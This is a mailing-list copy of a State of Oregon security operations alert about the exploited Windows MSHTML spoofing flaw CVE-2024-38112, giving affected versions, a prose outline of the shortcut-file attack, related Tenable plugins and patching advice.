[CDP-development] TLP:GREEN (Zero-Day Alert Notification) CVE-2024-38112: Microsoft Windows MSHTML Platform Spoofing Vulnerability

CSS Security Operations Services * DAS css-soc-services at das.oregon.gov
Wed Jul 10 11:40:14 PDT 2024 

Good morning,

The SOC Services team is reporting on the vulnerability: CVE-2024-38112: Microsoft Windows MSHTML Platform Spoofing Vulnerability. Due to its high visibility and knowledge of the software installed in the state environment, we are providing this in-depth information:

History: On July 9, 2024, Microsoft released updates to patch Windows and Windows Server products addressing an elevation of privilege vulnerability within the MSHTML platform. CVE-2024-38112 is currently assigned CVSSv3 rating of 7.5 (High).

The following products are affected by CVE-2024-38112:
*              Windows 10 (multiple versions)
*              Windows 11 (multiple versions)
*              Microsoft Windows Server (2008, 2012,2016, and 2022 - multiple versions)

Please note that the list of products affected by CVE-2024-38112 is extensive for detailed information please see the security advisory link below.

Microsoft has released the following security advisory related to CVE-2023-38112: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38112

Intelligence As of July 9, 2024, the vulnerability has been confirmed as being exploited in the wild.

Workarounds: There are no workarounds for this vulnerability.

How it works: Attackers use special Windows Internet Shortcut files (.url extension name), which, when clicked, would call the retired Internet Explorer (IE) to visit the attacker-controlled URL. By opening the URL with IE instead of the modern and much more secure Chrome/Edge browser on Windows, the attacker gained significant advantages in exploiting the victim's computer, although the computer is running the modern Windows 10/11 operating systems. This trick allows the attackers to continue hiding the file's true nature from the user who is intent on opening it by clicking through several pop-up warnings; the PDF file is a malicious HTA file, which executes and enables RCE.

Post-Exploit: If successfully exploited, this vulnerability could allow an attacker to deceive users by presenting them with misleading information or disguising malicious content as legitimate. This could lead to various consequences, such as tricking users into disclosing sensitive information or downloading malware onto their systems.

Indicators of Compromise (IoCs): No known indicators of compromise have been publicly shared at this time.

Tenable Plugins:
As of July 10, 2024, the following vulnerability plugins have been released and are currently in Tenable Security Center:
Plugin
Title
Severity
202043<https://www.tenable.com/plugins/nessus/202043>
KB5040434: Windows 10 Version 1607 / Windows Server 2016 Security Update (July 2024)
Critical
202042<https://www.tenable.com/plugins/nessus/202042>
KB5040448: Windows 10 LTS 1507 Security Update (July 2024)
High
202041<https://www.tenable.com/plugins/nessus/202041>
KB5040490: Windows Server 2008 Security Update (July 2024)
Critical
202040<https://www.tenable.com/plugins/nessus/202040>
KB5040431: Windows 11 version 21H2 Security Update (July 2024)
High
202039<https://www.tenable.com/plugins/nessus/202039>
KB5040437: Windows Server 2022 / Azure Stack HCI 22H2 Security Update (July 2024)
Critical
202038<https://www.tenable.com/plugins/nessus/202038>
KB5040438: Windows 11 version 22H2 / Windows Server version 23H2 Security Update (July 2024)
Critical
202037<https://www.tenable.com/plugins/nessus/202037>
KB5040427: Windows 10 Version 21H2 / Windows 10 Version 22H2 Security Update (July 2024)
High
202036<https://www.tenable.com/plugins/nessus/202036>
KB5040442: Windows 11 version 22H2 Security Update (July 2024)
High
202034<https://www.tenable.com/plugins/nessus/202034>
KB5040456: Windows Server 2012 R2 Security Update (July 2024)
Critical
202028<https://www.tenable.com/plugins/nessus/202028>
KB5040430: Windows 10 version 1809 / Windows Server 2019 Security Update (July 2024)
Critical

Recommended Actions:


  *   Verify host has not been compromised before applying patches.
  *   Apply appropriate updates provided by vendor to vulnerable systems immediately after appropriate testing.
  *   Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.
  *   Apply the Principle of Least Privilege to all systems and services.


[cid:image001.png at 01DAD2B8.E69C9D90]
Cyber Security Services
State of Oregon Cyber Security Services
Enterprise Information Services | SOC
Cyber Security Services (CSS)
SOC Hotline: (503) 378-5930 | SOC Services (503) 373-0378
"Ensuring user-friendly, reliable and secure state technology systems that equitably serve Oregonians."


-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://omls.oregon.gov/pipermail/cdp-development/attachments/20240710/a5539208/attachment-0001.html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image001.png
Type: image/png
Size: 21907 bytes
Desc: image001.png
URL: <https://omls.oregon.gov/pipermail/cdp-development/attachments/20240710/a5539208/attachment-0001.png>

More information about the CDP-development mailing list